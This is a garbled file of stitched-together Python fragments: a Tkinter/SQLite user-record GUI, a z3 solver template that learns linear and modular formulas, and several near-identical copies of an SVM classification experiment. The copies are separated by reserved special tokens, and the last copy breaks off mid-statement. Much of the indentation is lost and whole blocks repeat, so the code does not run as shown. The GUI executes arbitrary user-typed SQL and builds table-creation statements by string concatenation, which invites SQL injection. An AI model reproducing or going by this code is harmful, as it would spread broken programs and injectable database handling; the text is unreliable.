self.top1.mainloop()
    def delete_data(self):
        self.cursor.execute("Delete from user where id = ?", (e.get(),))
        self.list.delete(0, END)
        self.connection.commit()
        self.show_data()
def del_rec(self):
global e
self.top2 = Toplevel(self.scr)
self.top2.geometry("400x400")
l1 = Label(self.top2, text="USER_ID", font=('times', 25, 'bold'), bg="green2", fg="white")
l1.pack()
self.Id = StringVar()
e = Entry(self.top2, relief="sunken", textvariable=self.Id, font=('times', 25, 'bold'))
e.pack()
b = Button(self.top2, text="delete records", command=self.delete_data, font=('times', 25, 'bold'), bg="white",
fg="black")
b.pack()
self.top2.mainloop()
    def sample(self):
        # execute whatever SQL the user typed into the query entry
        self.cursor.execute(self.en3.get())
        r = self.cursor.fetchall()
        for row in r:
            self.list.insert(0, row)
        self.connection.commit()
    def file(self):
        # let the user pick a file and show its path in the listbox
        self.f1.filename = filedialog.askopenfilename(title="Select file")
        self.list.insert(0, self.f1.filename)
def add_record(self):
global e
global e1
global e2
global e3
global e4
global e5
self.e = StringVar()
self.e1 = StringVar()
self.e2 = StringVar()
self.e3 = StringVar()
self.e4 = StringVar()
self.e5 = StringVar()
self.top=Toplevel(self.scr)
self.top.geometry("400x800")
l=Label(self.top,text="USER_ID",font=('times',25,'bold'),bg="green2",fg="white")
l.pack()
e=Entry(self.top,relief="sunken",textvariable=self.e,font=('times',25,'bold'))
e.pack()
l1 = Label(self.top, text="USERNAME", font=('times', 25, 'bold'), bg="green2", fg="white")
l1.pack()
e1 = Entry(self.top, relief="sunken",textvariable=self.e1, font=('times', 25, 'bold'))
e1.pack()
l2 = Label(self.top, text="FATHERS NAME", font=('times', 25, 'bold'), bg="green2", fg="white")
l2.pack()
e2 = Entry(self.top, relief="sunken",textvariable=self.e2, font=('times', 25, 'bold'))
e2.pack()
l3 = Label(self.top, text="MOTHERS NAME", font=('times', 25, 'bold'), bg="green2", fg="white")
l3.pack()
e3 = Entry(self.top, relief="sunken",textvariable=self.e3, font=('times', 25, 'bold'))
e3.pack()
l4 = Label(self.top, text="CONTACT NO", font=('times', 25, 'bold'), bg="green2", fg="white")
l4.pack()
e4 = Entry(self.top, relief="sunken",textvariable=self.e4, font=('times', 25, 'bold'))
e4.pack()
l5 = Label(self.top, text="E-MAIL ID", font=('times', 25, 'bold'), bg="green2", fg="white")
l5.pack()
e5 = Entry(self.top, relief="sunken",textvariable=self.e5, font=('times', 25, 'bold'))
e5.pack()
varchk=IntVar()
b = Button(self.top, text="SUBMIT", command=self.insert_data,font=('times', 25, 'bold'), bg="white",fg="black")
b.pack()
self.top.mainloop()
def view_table(self):
global list_box
self.list_box = Listbox(self.left_frame, font=('times', 20, 'bold'))
try:
self.list_box.insert(1,"user")
self.list_box.insert(2,self.tbl_name)
except:
pass
b=Button(self.left_frame,text="Click",font=('times', 20, 'bold'),command=self.selection,bg="white",fg="black")
b.place(x=100,y=400)
self.list_box.place(x=10,y=50)
def selection(self):
lb = self.list_box.curselection()
print(lb)
for i in list(lb):
self.show_data()
    def show_records(self, event=None):
        # bound to the listbox <<ListboxSelect>> event, so it must accept the event argument
        global m
        m = self.list.curselection()
        m = self.list.get(m)
        self.id.delete(0, END)
        self.id.insert(END, self.add_record())
global table_name
def create_table(self):
self.top = Toplevel(self.scr)
self.top.geometry("400x800")
self.table_name=StringVar()
l=Label(self.top,text="Table",font=('times', 20, 'bold'),bg="white",fg="black")
l.pack()
e=Entry(self.top,textvariable=self.table_name,font=('times', 20, 'bold'))
e.pack()
b=Button(self.top,text="Add field",command=self.fun_show , font=('times', 20, 'bold'),bg="white",fg="black")
b.pack()
b=Button(self.top,text="OK",font=('times', 20, 'bold'),command=self.show_entered_data,bg="white",fg="black")
b.pack(side=RIGHT)
def show_entered_data(self):
global en1
global en2
global list1
global tbl_name
self.tbl_name=self.table_name.get()
self.en1=self.entry1.get()
self.en2=self.entry2.get()
sent="Create table "+str(self.tbl_name)+"('"+str(self.en1)+ " "+ str(self.en2)+"')"
list1 = Text(self.top, width=41, height=8, font=('times', 25, 'bold'))
list1.place(x=0,y=0)
list1.insert(0.0,sent)
print(self.tbl_name,self.en1,self.en2)
self.cursor.execute(sent)
self.list.insert(0,sent)
self.connection.commit()
def fun_show(self):
l = Label(self.top, text="Name", font=('times', 20, 'bold'), bg="white", fg="black")
l.pack(side=TOP)
self.entry1 = StringVar()
e1 = Entry(self.top, textvariable=self.entry1, font=('times', 20, 'bold'))
e1.pack()
l = Label(self.top, text="type", font=('times', 20, 'bold'), bg="white", fg="black")
l.pack(side=TOP)
self.entry2 = StringVar()
e1 = Entry(self.top, textvariable=self.entry2, font=('times', 20, 'bold'))
e1.pack()
Gui()
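
# Note: Gui() above runs at import time. A common pattern (a sketch, not part
# of the original code) is to guard the call so the module can be imported
# without opening a window:
#
#     if __name__ == "__main__":
#         Gui()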
import random
from z3 import *
def combine(items):
    # sum the items of a non-empty iterable; unlike sum(), no literal 0 is
    # prepended, so it also composes cleanly with z3 arithmetic terms
    tmp_list = [i for i in items]
    res = tmp_list[0]
    for i in tmp_list[1:]:
        res += i
    return res
def co_prime(num1, num2):
    # True iff num1 and num2 share no common divisor greater than 1
    for num in range(2, min(num1, num2) + 1):
        if num1 % num == 0 and num2 % num == 0:
            return False
    return True
def gcd(*nums):
    # brute-force greatest common divisor of several numbers, ignoring zeros
    min_num = 1 << 32
    for num in nums:
        if num != 0:
            min_num = min(min_num, abs(num))
for i in range(min_num, 1, -1):
flag = True
for num in nums:
if num % i != 0:
flag = False
break
if flag:
return i
return 1
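
# Quick sanity checks for the helpers above (illustrative additions, not part
# of the original code):
assert combine([1, 2, 3]) == 6   # behaves like sum() for non-empty iterables
assert co_prime(8, 15)           # 8 and 15 share no common divisor > 1
assert gcd(12, 18, 30) == 6      # brute-force GCD over several numbers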
class FormulaTemplate:
    def __init__(self, vi, w, k, h, m, timeout=3000000):  # w parameter added
        self.k = k  # number of clauses
        self.h = h  # upper bound on the number of (in)equality atoms
        self.m = m  # upper bound on the number of modular atoms
        self.w = w
        self.vi = vi
n = len(vi)
self.n = n
self.aeij = [[Int('ae' + str(i) + str(j)) for j in range(n)] for i in range(h)]
self.bi = [Int('b' + str(i)) for i in range(h)]
self.amij = [[Int('am' + str(i) + str(j)) for j in range(n)] for i in range(m)]
        self.ei = [Int('e' + str(i)) for i in range(m)]  # TODO: replace with fixed values; try candidates one by one starting from 2 (not implemented yet)
self.ci = [Int('c' + str(i)) for i in range(m)]
self.heij = [[Bool('h_e' + str(j) + str(i)) for i in range(h)] for j in range(k)]
self.hgeij = [[Bool('h_ge' + str(j) + str(i)) for i in range(h)] for j in range(k)]
self.hleij = [[Bool('h_le' + str(j) + str(i)) for i in range(h)] for j in range(k)]
self.tij = [[Bool('t' + str(j) + str(i)) for i in range(m)] for j in range(k)]
self.ntij = [[Bool('nt' + str(j) + str(i)) for i in range(m)] for j in range(k)]
self.s = Solver()
        for i in range(h):
            # the inequality coefficients ae_ij must not all be 0
            self.s.add(Or(*[a > 0 for a in self.aeij[i]]))
            for j in range(i + 1, h):
                # any two inequalities must differ in at least one coefficient
                self.s.add(Or(*[self.aeij[i][w] != self.aeij[j][w] for w in range(n)]))
        for i in range(m):
            # the modular coefficients am_ij must not all be <= 0
            self.s.add(Or(*[am > 0 for am in self.amij[i]]))
            # each am_ij must lie in [0, e_i)
            self.s.add(*[And(0 <= am, am < self.ei[i]) for am in self.amij[i]])
            # for j in range(i + 1, m):
            #     self.s.add(Or(self.ei[i] != self.ei[j],
            #                   *[self.amij[i][w] != self.amij[j][w] for w in range(n)]))
        # each remainder c_i must be non-negative and less than its modulus e_i
        self.s.add(*[And(self.ei[i] > self.ci[i], self.ci[i] >= 0) for i in range(m)])
        # each modulus must be at least 2 and bounded above (here by 10*m)
        self.s.add(*[And(e <= 10 * m, e >= 2) for e in self.ei])
        for i in range(k):
            for j in range(i + 1, k):
                # any two clauses must differ in at least one selector, unless one
                # of them contains a trivially false guard (all selectors of some
                # atom set at once), which makes that clause vacuous anyway
                all_true = [And(self.heij[i][w], self.hgeij[i][w], self.hleij[i][w]) for w in range(h)]
                all_true.extend([And(self.tij[i][w], self.ntij[i][w]) for w in range(m)])
                struct_const = [Or(self.heij[i][w] != self.heij[j][w],
                                   self.hgeij[i][w] != self.hgeij[j][w],
                                   self.hleij[i][w] != self.hleij[j][w]) for w in range(h)]
                struct_const.extend([Or(self.tij[i][w] != self.tij[j][w],
                                        self.ntij[i][w] != self.ntij[j][w]) for w in range(m)])
                self.s.add(Or(*struct_const, *all_true))
self.s.set("timeout", timeout)
def add(self, example, label):
self.s.add(self.encoding(example, label))
def check(self):
check = self.s.check()
if check == sat:
self.solve_model()
return check
    @staticmethod
    def W_size(m):
        # maps the tried width w to a fixed modulus value, e.g. W_size(3) == 5
        return m + 2
    def encoding(self, example, label):
        # constrain the template so that the learned DNF evaluates to `label` on this example
Equ = [combine(example[j] * self.aeij[i][j] for j in range(self.n)) != self.bi[i] for i in range(self.h)]
Ge = [combine(example[j] * self.aeij[i][j] for j in range(self.n)) >= self.bi[i] for i in range(self.h)]
Le = [combine(example[j] * self.aeij[i][j] for j in range(self.n)) <= self.bi[i] for i in range(self.h)]
Me = [combine(example[j] * self.amij[i][j] for j in range(self.n)) % self.ei[i] == self.ci[i] for i in
range(self.m)]
Tk = []
for k in range(self.k):
clause = []
clause.extend([Implies(self.heij[k][h], Equ[h]) for h in range(self.h)])
clause.extend([Implies(self.hgeij[k][h], Ge[h]) for h in range(self.h)])
clause.extend([Implies(self.hleij[k][h], Le[h]) for h in range(self.h)])
clause.extend([Implies(self.tij[k][m], Me[m]) for m in range(self.m)])
clause.extend([Implies(self.ntij[k][m], Not(Me[m])) for m in range(self.m)])
Tk.append(And(*clause))
# print("Or(*Tk) , label=\n",Or(*Tk),label)
return Or(*Tk) == label
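    # How the encoding works (explanatory note): for each clause k, a Boolean
    # guard (heij/hgeij/hleij/tij/ntij) switches the corresponding atom on via
    # an implication, and the resulting DNF Or(*Tk) is constrained to equal the
    # example's label.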
    def solve_model(self):  # extract concrete values from the SAT model (w added)
print("w", self.w)
#W_size = [2,3,4,5,6,7,8,9]
model = self.s.model()
self.M = [[model[self.amij[i][j]].as_long() if model[self.amij[i][j]] is not None else 0
for j in range(self.n)]
for i in range(self.m)]
        # previously the moduli e were solved by z3 (kept for reference):
        # self.E = [model[self.ei[i]].as_long() if model[self.ei[i]] is not None else 1 for i in range(self.m)]
        # print("E= \n", self.E)
        # change: fix every modulus to W_size(w) instead of a z3-chosen value
for i in range(self.m):
self.ei[i] = FormulaTemplate.W_size(self.w)
self.E = [self.ei[i] for i in range(self.m)]
print("E = \n",self.E)
####
self.C = [model[self.ci[i]].as_long() if model[self.ci[i]] is not None else 0 for i in range(self.m)]
self.A = [[model[self.aeij[i][j]].as_long() if model[self.aeij[i][j]] is not None else 0
for j in range(self.n)]
for i in range(self.h)]
self.B = [model[self.bi[i]].as_long() if model[self.bi[i]] is not None else 0 for i in range(self.h)]
self.He = [
[bool(model[self.heij[i][j]]) if model[self.heij[i][j]] is not None else False
for j in range(self.h)]
for i in range(self.k)
]
self.Hge = [
[bool(model[self.hgeij[i][j]]) if model[self.hgeij[i][j]] is not None else False
for j in range(self.h)]
for i in range(self.k)
]
self.Hle = [
[bool(model[self.hleij[i][j]]) if model[self.hleij[i][j]] is not None else False
for j in range(self.h)]
for i in range(self.k)
]
self.T = [
[bool(model[self.tij[i][j]]) if model[self.tij[i][j]] is not None else False
for j in range(self.m)]
for i in range(self.k)
]
self.Nt = [
[bool(model[self.ntij[i][j]]) if model[self.ntij[i][j]] is not None else False
for j in range(self.m)]
for i in range(self.k)
]
for i in range(self.m):
            flag = True  # whether all nonzero coefficients are equal
pix = -1
for am in self.M[i]:
if pix == -1:
if am != 0:
pix = am
elif am != 0 and am != pix:
flag = False
break
            if flag:  # all coefficients identical
                if self.C[i] == 0:
                    # if co_prime(pix, self.E[i]):
                    #     for j in range(self.n):
                    #         if self.M[i][j] != 0:
                    #             self.M[i][j] = 1
                    # else:
                    #     div = gcd(pix, self.E[i])
                    #     self.E[i] /= div
                    #     for j in range(self.n):
                    #         self.M[i][j] /= div
                    if not co_prime(pix, self.E[i]):
                        self.E[i] //= gcd(pix, self.E[i])  # integer division: gcd divides E[i] exactly
                    for j in range(self.n):
                        self.M[i][j] = 1
                else:
                    # divide through by common factors; // keeps everything an int
                    div = gcd(pix, self.E[i], self.C[i])
                    self.E[i] //= div
                    self.C[i] //= div
                    pix //= div
                    for j in range(self.n):
                        self.M[i][j] //= div
                    div = gcd(int(pix), int(self.C[i]))
                    for j in range(self.n):
                        self.M[i][j] //= div
                    self.C[i] //= div
        for i in range(self.h):
            divisor = gcd(*self.A[i], self.B[i])
            self.B[i] //= divisor
            for j in range(self.n):
                self.A[i][j] //= divisor
for i in range(len(self.E)):
self.E[i] = int(self.E[i])
    def formula_model(self, *val):  # build the learned formula; symbolic arguments yield a predicate, concrete values a truth value
if len(val) == 0:
val = self.vi
formu = []
for k in range(self.k):
clause = []
for h in range(self.h):
Coe = combine(self.A[h][j] * val[j] for j in range(self.n))
status = (self.He[k][h], self.Hge[k][h], self.Hle[k][h])
                if status == (False, False, True):  # the guard triple selects the comparison (!=, >=, <=)
clause.append(Coe <= self.B[h])
elif status == (False, True, False):
clause.append(Coe >= self.B[h])
elif status == (True, False, False):
clause.append(Coe != self.B[h])
elif status == (False, True, True):
clause.append(Coe == self.B[h])
elif status == (True, False, True):
clause.append(Coe < self.B[h])
elif status == (True, True, False):
clause.append(Coe > self.B[h])
elif status == (True, True, True):
clause.append(False)
for m in range(self.m):
status = (self.T[k][m], self.Nt[k][m])
                if status == (True, False):  # modular atom selected positively
clause.append(combine(self.M[m][j] * val[j] for j in range(self.n)) % self.E[m] == self.C[m])
elif status == (False, True):
clause.append(combine(self.M[m][j] * val[j] for j in range(self.n)) % self.E[m] != self.C[m])
elif status == (True, True):
clause.append(False)
formu.append(And(*clause))
# print("simplify(Or(*formu))=\n",simplify(Or(*formu)))
return simplify(Or(*formu))
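    # Usage sketch (assumed workflow): once check() has returned sat,
    # formula_model() yields the learned predicate over self.vi, while e.g.
    # formula_model(3, 5) evaluates that predicate at the point (3, 5).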
def refine_modu(self, coe, e, b, res, tmp, last=0):
        if len(coe) == 1:
            if coe[0] == 0:
                # zero coefficient: nothing to choose, just check feasibility
                if last % e != b:
                    return
                tmp.append(0)
            else:
                for i in range(e):
                    if (i + last) % e == b:
                        tmp.append(i)
                        break
            res.append(list(tmp))
            tmp.pop()
elif coe[0] == 0:
tmp.append(0)
self.refine_modu(coe[1:], e, b, res, tmp, last)
tmp.pop()
else:
for i in range(e):
tmp.append(i)
self.refine_modu(coe[1:], e, b, res, tmp, last + i)
tmp.pop()
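    # Worked example (illustrative): refine_modu([1, 1], 3, 2, res, []) collects
    # every per-variable residue pair summing to 2 modulo 3, leaving
    # res == [[0, 2], [1, 1], [2, 0]].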
def build_formula(self, coe, V, e, C):
expr = And(*[(coe[i] * v) % e == C[i] for i, v in enumerate(V)])
return simplify(expr)
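    # Note (explanatory): build_formula strengthens a single congruence
    # sum_i(coe[i] * v_i) % e == b into per-variable congruences
    # (coe[i] * v_i) % e == C[i], one conjunction per residue assignment C
    # enumerated by refine_modu.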
def refine_model(self):
formu_arr = []
for k in range(self.k):
clause = []
for h in range(self.h):
Coe = combine(self.A[h][j] * self.vi[j] for j in range(self.n))
status = (self.He[k][h], self.Hge[k][h], self.Hle[k][h])
if status == (False, False, True):
clause.append([Coe < self.B[h], Coe == self.B[h]])
elif status == (False, True, False):
clause.append([Coe > self.B[h], Coe == self.B[h]])
elif status == (True, False, False):
clause.append([Coe < self.B[h], Coe > self.B[h]])
elif status == (False, True, True):
clause.append([Coe == self.B[h]])
elif status == (True, False, True):
clause.append([Coe < self.B[h]])
elif status == (True, True, False):
clause.append([Coe > self.B[h]])
elif status == (True, True, True):
clause.append([False])
for m in range(self.m):
status = (self.T[k][m], self.Nt[k][m])
# Com = combine(self.M[m][j] * self.vi[j] for j in range(self.n))
if status == (True, False):
# clause.append([Com % self.E[m] == self.C[m]])
mod_res = []
self.refine_modu(self.M[m], self.E[m], self.C[m], mod_res, [])
for C in mod_res:
clause.append([self.build_formula(self.M[m], self.vi, self.E[m], C)])
elif status == (False, True):
mod_clause = []
for i in range(self.E[m]):
if i != self.C[m]:
# mod_clause.append(Com % self.E[m] == i)
mod_res = []
self.refine_modu(self.M[m], self.E[m], i, mod_res, [])
for C in mod_res:
mod_clause.append(self.build_formula(self.M[m], self.vi, self.E[m], C))
clause.append(mod_clause)
elif status == (True, True):
clause.append([False])
formu_arr.append(clause)
return formu_arr
class EquTemplate:
def __init__(self, n):
self.vi = [Int('v' + str(i)) for i in range(n)]
self.b = Int('b')
self.s = Solver()
def add(self, vector):
vi, target = vector[:-1], vector[-1]
expr = combine(vi[i] * self.vi[i] for i in range(len(self.vi))) + self.b == target
self.s.add(expr)
def check(self):
return self.s.check()
def solve_model(self):
model = self.s.model()
V = [model[v].as_long() if model[v] is not None else 0 for v in self.vi]
B = model[self.b].as_long() if model[self.b] is not None else 0
expr = combine(V[i] * self.vi[i] for i in range(len(self.vi))) + B
return simplify(expr)
if __name__ == '__main__':
    # smt = FormulaTemplate([Int('v1'), Int('v2')], 4, 3, 2)  # note: this demo predates the added w parameter
# smt.add([1, 2], True)
# smt.add([2, 3], False)
# print(smt.s)
# print(smt.check())
#
# arr = smt.refine_model()
# for a in arr:
# print(a)
#
# formu = smt.formula_model()
# print(formu)
# print('-' * 50)
# print(simplify(formu))
# print('-' * 50)
smt = EquTemplate(2)
smt.add([0, 1, 1])
smt.add([1, 2, 1])
smt.add([3, 6, 3])
if smt.check() == sat:
print(smt.solve_model()) # 1*v0 + 2*v1 + 1
else:
print(unsat)
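# End-to-end sketch for FormulaTemplate (assumed; mirrors the commented demo
# in __main__ with the added w argument, using an illustrative w=2):
#   smt = FormulaTemplate([Int('v1'), Int('v2')], 2, 4, 3, 2)  # vi, w, k, h, m
#   smt.add([1, 2], True)
#   smt.add([2, 3], False)
#   if smt.check() == sat:
#       print(smt.formula_model())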
|
<|reserved_special_token_0|>
def test_linearSVC(*data):
X_train, X_test, y_train, y_test = data
cls = svm.LinearSVC()
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))
print('Scors:%.2f' % cls.score(X_test, y_test))
def test_SVC_linear(*data):
X_train, X_test, y_train, y_test = data
cls = svm.SVC(kernel='linear')
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))
print('Scors:%.2f' % cls.score(X_test, y_test))
def test_SVC_poly(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
degrees = range(1, 2)
train_scores = []
test_scores = []
for degree in degrees:
cls = svm.SVC(kernel='poly', degree=degree)
cls.fit(X_train, y_train)
train_scores.append(cls.score(X_train, y_train))
test_scores.append(cls.score(X_test, y_test))
print('Scors:%.2f' % cls.score(X_test, y_test))
ax = fig.add_subplot(1, 3, 1)
ax.plot(degrees, train_scores, label='Training score ', marker='+')
ax.plot(degrees, test_scores, label='Testing score ', marker='o')
ax.set_title('SVC_poly_degree ')
ax.set_xlabel('p')
ax.set_ylabel('score')
ax.set_ylim(0, 1.05)
ax.legend(loc='best', framealpha=0.5)
plt.show()
def test_SVC_rbf(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
cls = svm.SVC(C=1000.0, kernel='rbf', gamma=0.1, probability=True)
cls.fit(X_train, y_train)
print('Scors:%.2f' % cls.score(X_test, y_test))
print('probability')
print(cls.predict(X_test))
return cls.predict_proba(X_test)
<|reserved_special_token_0|>
def main():
DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'
DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'
train_datas = base.load_csv_without_header(DATA_TRAIN, target_dtype=np.
int16, features_dtype=np.float32, target_column=0)
test_datas = base.load_csv_without_header(DATA_TEST, target_dtype=np.
int16, features_dtype=np.float32, target_column=0)
test_SVC_sigmod(train_datas.data, test_datas.data, train_datas.target,
test_datas.target)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_linearSVC(*data):
X_train, X_test, y_train, y_test = data
cls = svm.LinearSVC()
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))
print('Scors:%.2f' % cls.score(X_test, y_test))
def test_SVC_linear(*data):
X_train, X_test, y_train, y_test = data
cls = svm.SVC(kernel='linear')
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))
print('Scors:%.2f' % cls.score(X_test, y_test))
def test_SVC_poly(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
degrees = range(1, 2)
train_scores = []
test_scores = []
for degree in degrees:
cls = svm.SVC(kernel='poly', degree=degree)
cls.fit(X_train, y_train)
train_scores.append(cls.score(X_train, y_train))
test_scores.append(cls.score(X_test, y_test))
print('Scors:%.2f' % cls.score(X_test, y_test))
ax = fig.add_subplot(1, 3, 1)
ax.plot(degrees, train_scores, label='Training score ', marker='+')
ax.plot(degrees, test_scores, label='Testing score ', marker='o')
ax.set_title('SVC_poly_degree ')
ax.set_xlabel('p')
ax.set_ylabel('score')
ax.set_ylim(0, 1.05)
ax.legend(loc='best', framealpha=0.5)
plt.show()
def test_SVC_rbf(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
cls = svm.SVC(C=1000.0, kernel='rbf', gamma=0.1, probability=True)
cls.fit(X_train, y_train)
print('Scors:%.2f' % cls.score(X_test, y_test))
print('probability')
print(cls.predict(X_test))
return cls.predict_proba(X_test)
def grid_SVC_rbf(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
param_grid = {'C': [1000.0, 5000.0, 10000.0, 50000.0, 100000.0],
'gamma': [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1]}
cls = GridSearchCV(svm.SVC(kernel='rbf'), param_grid)
cls.fit(X_train, y_train)
print('Best estimotor by GridSearchCV:')
print(cls.best_estimator_)
<|reserved_special_token_0|>
def main():
DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'
DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'
train_datas = base.load_csv_without_header(DATA_TRAIN, target_dtype=np.
int16, features_dtype=np.float32, target_column=0)
test_datas = base.load_csv_without_header(DATA_TEST, target_dtype=np.
int16, features_dtype=np.float32, target_column=0)
test_SVC_sigmod(train_datas.data, test_datas.data, train_datas.target,
test_datas.target)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_linearSVC(*data):
X_train, X_test, y_train, y_test = data
cls = svm.LinearSVC()
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))
print('Scors:%.2f' % cls.score(X_test, y_test))
def test_SVC_linear(*data):
X_train, X_test, y_train, y_test = data
cls = svm.SVC(kernel='linear')
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))
print('Scors:%.2f' % cls.score(X_test, y_test))
def test_SVC_poly(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
degrees = range(1, 2)
train_scores = []
test_scores = []
for degree in degrees:
cls = svm.SVC(kernel='poly', degree=degree)
cls.fit(X_train, y_train)
train_scores.append(cls.score(X_train, y_train))
test_scores.append(cls.score(X_test, y_test))
print('Scors:%.2f' % cls.score(X_test, y_test))
ax = fig.add_subplot(1, 3, 1)
ax.plot(degrees, train_scores, label='Training score ', marker='+')
ax.plot(degrees, test_scores, label='Testing score ', marker='o')
ax.set_title('SVC_poly_degree ')
ax.set_xlabel('p')
ax.set_ylabel('score')
ax.set_ylim(0, 1.05)
ax.legend(loc='best', framealpha=0.5)
plt.show()
def test_SVC_rbf(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
cls = svm.SVC(C=1000.0, kernel='rbf', gamma=0.1, probability=True)
cls.fit(X_train, y_train)
print('Scors:%.2f' % cls.score(X_test, y_test))
print('probability')
print(cls.predict(X_test))
return cls.predict_proba(X_test)
def grid_SVC_rbf(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
param_grid = {'C': [1000.0, 5000.0, 10000.0, 50000.0, 100000.0],
'gamma': [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1]}
cls = GridSearchCV(svm.SVC(kernel='rbf'), param_grid)
cls.fit(X_train, y_train)
print('Best estimotor by GridSearchCV:')
print(cls.best_estimator_)
def test_SVC_sigmod(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
gammas = range(1, 2)
train_scores = []
test_scores = []
for gamma in gammas:
cls = svm.SVC(kernel='sigmoid', gamma=gamma, coef0=0)
cls.fit(X_train, y_train)
train_scores.append(cls.score(X_train, y_train))
test_scores.append(cls.score(X_test, y_test))
print('Scors:%.2f' % cls.score(X_test, y_test))
ax = fig.add_subplot(1, 1, 1)
ax.plot(gammas, train_scores, label='Training score ', marker='+')
ax.plot(gammas, test_scores, label='Testing score ', marker='o')
ax.set_title('SVC_sigmoid_gamma ')
ax.set_xscale('log')
ax.set_xlabel('$\\gamma$')
ax.set_ylabel('score')
ax.set_ylim(0, 1.05)
ax.legend(loc='best', framealpha=0.5)
plt.show()
def main():
DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'
DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'
train_datas = base.load_csv_without_header(DATA_TRAIN, target_dtype=np.
int16, features_dtype=np.float32, target_column=0)
test_datas = base.load_csv_without_header(DATA_TEST, target_dtype=np.
int16, features_dtype=np.float32, target_column=0)
test_SVC_sigmod(train_datas.data, test_datas.data, train_datas.target,
test_datas.target)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_linearSVC(*data):
X_train, X_test, y_train, y_test = data
cls = svm.LinearSVC()
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))
print('Scors:%.2f' % cls.score(X_test, y_test))
def test_SVC_linear(*data):
X_train, X_test, y_train, y_test = data
cls = svm.SVC(kernel='linear')
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))
print('Scors:%.2f' % cls.score(X_test, y_test))
def test_SVC_poly(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
degrees = range(1, 2)
train_scores = []
test_scores = []
for degree in degrees:
cls = svm.SVC(kernel='poly', degree=degree)
cls.fit(X_train, y_train)
train_scores.append(cls.score(X_train, y_train))
test_scores.append(cls.score(X_test, y_test))
print('Scors:%.2f' % cls.score(X_test, y_test))
ax = fig.add_subplot(1, 3, 1)
ax.plot(degrees, train_scores, label='Training score ', marker='+')
ax.plot(degrees, test_scores, label='Testing score ', marker='o')
ax.set_title('SVC_poly_degree ')
ax.set_xlabel('p')
ax.set_ylabel('score')
ax.set_ylim(0, 1.05)
ax.legend(loc='best', framealpha=0.5)
plt.show()
def test_SVC_rbf(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
cls = svm.SVC(C=1000.0, kernel='rbf', gamma=0.1, probability=True)
cls.fit(X_train, y_train)
print('Scors:%.2f' % cls.score(X_test, y_test))
print('probability')
print(cls.predict(X_test))
return cls.predict_proba(X_test)
def grid_SVC_rbf(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
param_grid = {'C': [1000.0, 5000.0, 10000.0, 50000.0, 100000.0],
'gamma': [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1]}
cls = GridSearchCV(svm.SVC(kernel='rbf'), param_grid)
cls.fit(X_train, y_train)
print('Best estimotor by GridSearchCV:')
print(cls.best_estimator_)
def test_SVC_sigmod(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
gammas = range(1, 2)
train_scores = []
test_scores = []
for gamma in gammas:
cls = svm.SVC(kernel='sigmoid', gamma=gamma, coef0=0)
cls.fit(X_train, y_train)
train_scores.append(cls.score(X_train, y_train))
test_scores.append(cls.score(X_test, y_test))
print('Scors:%.2f' % cls.score(X_test, y_test))
ax = fig.add_subplot(1, 1, 1)
ax.plot(gammas, train_scores, label='Training score ', marker='+')
ax.plot(gammas, test_scores, label='Testing score ', marker='o')
ax.set_title('SVC_sigmoid_gamma ')
ax.set_xscale('log')
ax.set_xlabel('$\\gamma$')
ax.set_ylabel('score')
ax.set_ylim(0, 1.05)
ax.legend(loc='best', framealpha=0.5)
plt.show()
def main():
DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'
DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'
train_datas = base.load_csv_without_header(DATA_TRAIN, target_dtype=np.
int16, features_dtype=np.float32, target_column=0)
test_datas = base.load_csv_without_header(DATA_TEST, target_dtype=np.
int16, features_dtype=np.float32, target_column=0)
test_SVC_sigmod(train_datas.data, test_datas.data, train_datas.target,
test_datas.target)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--learning_rate', type=float, default=0.01, help=
'Initial learning rate.')
parser.add_argument('--max_steps', type=int, default=100000, help=
'Number of steps to run trainer.')
parser.add_argument('--percentage', type=float, default=0.99, help=
'Number of float for pca remain percentage.')
parser.add_argument('--hidden2', type=int, default=32, help=
'Number of units in hidden layer 2.')
parser.add_argument('--batch_size', type=int, default=1, help=
'Batch size. Must divide evenly into the dataset sizes.')
parser.add_argument('--input_data_dir', type=str, default=
'/home/freebirdweij/tf_works/invest', help=
'Directory to put the input data.')
parser.add_argument('--log_dir', type=str, default=
